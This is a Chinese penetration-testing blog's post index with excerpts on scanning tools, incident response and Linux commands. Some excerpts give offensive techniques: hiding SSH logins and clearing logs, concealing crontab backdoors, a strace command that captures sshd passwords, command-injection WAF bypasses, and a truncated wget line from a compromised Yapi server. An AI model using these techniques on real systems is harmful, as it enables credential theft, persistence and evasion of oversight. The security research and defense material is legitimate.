- 博客(19)
- 资源 (1)
- 收藏
- 关注
原创 渗透测试常用武器分享 第四期(漏洞扫描)
xray漏洞扫描 | 6.8k Star简介: 一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc点评: 可以用爬虫主动扫描,代理被动扫描。更新及时,官方不定期举办poc活动。配合登录态爬虫+被动扫描简直自动化神器,推荐!!地址: https://github.com/chaitin/xrayNuclei开源 | 漏洞扫描 | Golang | 8.2k Star简介: Nuclei使用零误报的定制模板向目标发送请求,同时可以对大量主机进行快速扫描
2022-05-22 12:32:50 1980
原创 渗透测试常用武器分享 第五期(SRC批量工具)
本期是关于src挖洞中那些批量化的工。每个工具都有自己特色,适合在不同的场景下使用。祝你挖必洞!ARL开源 | 批量工具 | Python | 2.6k Star简介: 快速侦察与目标关联的互联网资产,构建基础资产信息库。协助甲方安全团队或者渗透测试人员有效侦察和检索资产,发现存在的薄弱点和攻击面。点评: 界面方便、强大、好用地址: https://github.com/TophantTechnology/ARLAutoscanner开源 | 批量工具 | Python | 4
2022-05-22 12:31:36 1089
原创 渗透测试常用武器分享 第三期(信息收集2)
OneForAll开源 | 信息收集 | Python简介: OneForAll是一款功能强大的子域收集工具点评: 比较有名的信息收集工具,收集途径也比较全地址:https://github.com/shmilylty/OneForAllYasso开源 | 信息收集 | Golang简介: 强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,mssql,mysql,winrm等服务爆破,快速的端口扫描,强大的web指
2022-04-21 12:37:08 442
原创 渗透测试常用武器分享 (信息收集)
分享一波自己觉得还不错的外网信息收集工具,在用工具收集完信息后,再结合手动的一些信息收集。提高效率的同时也更容易收获漏洞。排名不分先后,感谢师傅的分享精神,网络安全有你们更精彩!nemo_go开源 | 信息收集 | Golang | 资产管理简介:Nemo是用来进行自动化信息收集的一个简单平台,通过集成常用的信息收集工具和技术,实现对内网及互联网资产信息的自动收集,提高隐患排查和渗透测试的工作效率,用Go语言完全重构了原Python版本点评:集成了IP资产、域名资产...
2022-04-11 10:09:45 1218
原创 溯源分析报告,脱敏文件!仅供参考!!
攻击者画像:发现利用冰蝎Webshell工具连接后门一、事件描述发现攻击者尝试用冰蝎Webshell工具连接后门。冰蝎是一款使用加密方式连接后门程序的客户端工具。攻击者正在连接并访问后门程序。受害主机可能已经被植入后门、远控或木马,导致受害主机已经沦陷,成为傀儡机。二、行为分析通过对传输的数据包进行分析,发现以下1个账号存在弱口令登录行为。天眼告警中发现利用冰蝎Webshell工具连接后门告警经过天眼告警分析,发现以下两个网站存在冰蝎后门:xxx.xxx.orgx
2021-07-07 23:10:44 2626
原创 Yapi平台-有安全漏洞,服务器真被入侵了,附POC
最近看到有人的YAPI接口管理平台服务器被黑了。发现这个漏洞好像部分还存在,漏洞利用前提还是在注册用户的前提下。所以应急方式也是先关闭注册功能,排查已经注册的用户。看看有没有恶意用户。版本号版本: 1.9.2什么问题服务器被入侵了, 阿里云报的: -[25877] PM2 v4.4.0: God Daemon (/root/.pm2) -[26378] node server/app.js -[31498] /bin/sh -c id;wget ht...
2021-07-07 22:15:51 826
原创 最新护网/重保网络安全应急演练方案[精华]
放一个 网络安全应急演练方案的模板,框架有了, 大家根据自己需求做点调整。演练说明演练场景本次演练以业务系统遭受外部攻击,服务器沦陷,从而导致系统被破坏为背景。主要模拟事件发现与评估、启动响应、信息通报、应急处置、问题根除、恢复重建、调查和持续改进全过程。演练时间20XX/XX/XX-20XX/XX/XX演练范围涉及业务系统如下:1、A:xxx5、B:xxx6、C:xxx演练目标 应急检验:通过开展应急演练,检验一旦发生危害事件时,提升部门的应急能力和响应..
2021-06-27 15:42:00 5449
原创 linux应急常用命令+技巧总结
常用命令top # 命令可以直接看到进程实时情况。ps aux --sort=pcpu | head -10 # 查看cpu占用率前十的进程,有时候可以发现top发现不了的东西netstat -anpl # 检查当前存在的连接与监听端口ps -ef #查看当前系统上运行的所有进程与其使用的命令w # 查看活动用户who # 查看当前登录用户(tty 本地登陆 pts 远程登录) /var/log/utmplast # 查看用户登录日志,查看我们系统的成功登录、关机、重启等情况 /var/l
2021-03-12 11:45:18 505
原创 linux-wrapper跟inetd服务后门
通过本文,你将会学习如下6个linux痕迹隐藏技巧,祝师傅牛气冲天!隐藏远程SSH登陆记录清除当前的history记录隐藏Vim的操作记录隐藏文件修改时间锁定文件清除系统日志痕迹隐藏远程SSH登陆记录隐身登录系统,不会被w、last等指令检测到。ssh -T root@192.0.0.1 /bin/bash -i-T表示不分配伪终端,/usr/bin/bash 表示在登录后调用bash命令 -i 表示是交互式shell原理w/last命令日志/var/log/wtmp 是utmp
2021-03-10 18:51:46 594
原创 Linux痕迹隐藏小技巧!
目录隐藏远程SSH登陆记录清除当前的history记录隐藏Vim的操作记录隐藏文件修改时间锁定文件清除系统日志痕迹隐藏远程SSH登陆记录隐身登录系统,不会被w、last等指令检测到。ssh -T root@192.0.0.1 /bin/bash -i -T表示不分配伪终端,/usr/bin/bash 表示在登录后调用bash命令 -i 表示是交互式shell原理 w/last命令日志/var/log/wtmp 是utmp和wtmp的日志接口产生的,而这俩接口是正常登陆分配伪
2021-03-09 10:26:51 902 2
原创 linux隐藏你的crontab后门
crontab定时后门 crontab是用来定期执行程序的命令,crond 命令每分钟会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。 注意: 新创建的 cron 任务,不会马上执行,至少要过 2 分钟后才可以,当然你可以重启 cron 来马上执行 比如我们通过redis写crontab后,管理员上线 执行crontab -l 就会查看到我们留下的可疑命令。那么我们如果躲避管理员的查看呢? 其实 crontab -l 是查看保存在这里 /var/spool/cron
2021-03-08 10:37:00 926
原创 渗透测试在线工具集合
社工搜索手机号注册过哪些网站搜索用户名搜索邮箱验证邮箱是否存在查看泄漏记录ip定位工具临时手机号临时邮箱检测一个网站是不是蜜罐天眼查ip查询指纹识别云悉指纹ThreatScanBugScanerTScan子域名查询C段查询dnsdbsearchdns在线子域名工具爆破ip138ssl证书反查spysecrt.shcensys历史DNS记录netcraftviewdnssecuritytrails病毒检测virustotal微步在线勒索病毒解
2021-02-24 16:04:43 654
原创 [渗透工具] - IP资产POC扫描、指纹扫描、端口爆破扫描系统
地址 : https://github.com/awake1t/linglonglinglong一款资产巡航扫描系统。系统定位是通过masscan+nmap无限循环去发现新增资产,自动进行端口弱口令爆破/、指纹识别、XrayPoc扫描。主要功能包括: 资产探测、端口爆破、Poc扫描、指纹识别、定时任务、管理后台识别、报表展示。 使用场景是Docker搭建好之后,设置好你要扫描的网段跟爆破任务。就不要管他了,没事过来收漏洞就行了功能清单 masscan+namp巡航扫描资产 创建定时爆破任务(FT
2021-02-21 14:34:14 3325 1
原创 linux后门之strace后门键盘记录
介绍strace是一个动态跟踪工具,它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围使用场景通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。我们想要获取当前主机的密码,或者通过这台主机连接到其他主机的密码。记录sshd进程明文密码执行如下命令(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read
2021-02-21 13:57:57 1088 4
原创 快速判断是不是docker环境
进程数很少,比如少于10条常见的命令却没有,如没有wget命令存在/.dockerenv文件/proc/1/cgroup内包含”docker”字符串公众号: 【渗透测试教程】 专注渗透测试、渗透自动化武器研发。希望能够给你带来收获!...
2021-02-18 17:16:24 2015
原创 渗透测试工具BurpSuite教程中的奇滛小技巧
如果每个人都理解你,你得普通成什么样前言分享一些使用burp中自己常用的技巧,觉得实用的话记得分享一下哦~1.快速生成CSRF测试代码测试csrf漏洞时候,快速生成scrf的html的代码。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z5Y6Pq6q-1613545491053)(data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAA.
2021-02-17 15:06:05 453
原创 golang操作chromedp模拟浏览器基础入门
源起最近有个项目要用到headless,以前用过python Selenium。最近想试下go版本的。但是刚开始时候,发现一个坑。网上有部分代码是老版本的chromedp。新版本不通用,就记录下我的学习过程chromedp 是什么?广泛使用的headless browser解决方案PhantomJS已经宣布不再继续维护,转而推荐使用headless chrome那么headless chrome究竟是什么呢,Headless Chrome 是 Chrome 浏览器的无界面形态,可以在不打开浏览器
2021-02-17 15:03:43 10135
原创 渗透测试中waf命令执行的绕过经验技巧
管道符;顺序执行,命令之间没有逻辑关系正常顺序执行&&逻辑与; 当命令1正确执行后,才会执行命令2。否则命令2不会执行两个命令都会执行||逻辑或; 当命令1不正确执行后,命令2才会执行。否则命令2不会执行mi会执行whom其他特殊符号符号作用’单引号,在单引号中所有的特殊符号,如“$”和“`”(反引号)都无特殊含义"双引号,在双引号中特殊符号都无特殊含义,但“$”、“`”(反引号)和“\”是例外,拥
2021-02-17 15:01:39 637
原创 弱口令扫描工具 - 一款跨平台小巧的端口爆破工具
介绍一款跨平台小巧的端口爆破工具,支持爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD。使用说明 ip.txt中放入需要爆破的ip+端口,比如 10.10.10.10:3306。 如果不是标准端口,比如3307是MYSQL。写成 10.10.10.10:3306|MYSQL。 其他 FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD同理 Windows/MAC/Linux已经打包好了,分别对应(PortBruteWin.exe
2021-02-17 14:48:28 1374
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人